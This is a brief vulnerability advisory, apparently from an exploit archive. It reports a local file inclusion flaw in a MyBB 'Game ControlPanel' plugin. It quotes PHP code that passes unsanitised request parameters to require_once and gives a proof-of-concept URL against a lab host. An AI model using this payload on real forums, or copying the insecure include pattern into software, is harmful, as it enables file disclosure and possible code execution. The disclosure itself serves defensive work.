HwcCrew

MyBB Plugin Game ControlPanel <= 1.0 Local File Inclusion

# Version: 1.0

Introduction
------------

This plugin adds a Control Panel to your copy of MyBB Forum.

Local File Inclusion
--------------------

gamecp.php L.45

 1
 2if(empty($mybb->input['action']))
 3{
 4        $finclude = sprintf("gamecp/%s/index.php", $mybb->input['game']);
 5}
 6else
 7{
 8        $finclude = sprintf("gamecp/%s/%s.php", $mybb->input['game'], $mybb->input['action']);
 9}
10require_once $finclude;

Proof of concept
----------------

http://pentest.lan/mybb/gamecp.php?action=path/to&game=file

Groucho

Be the first to give feedback !

Please login to comment !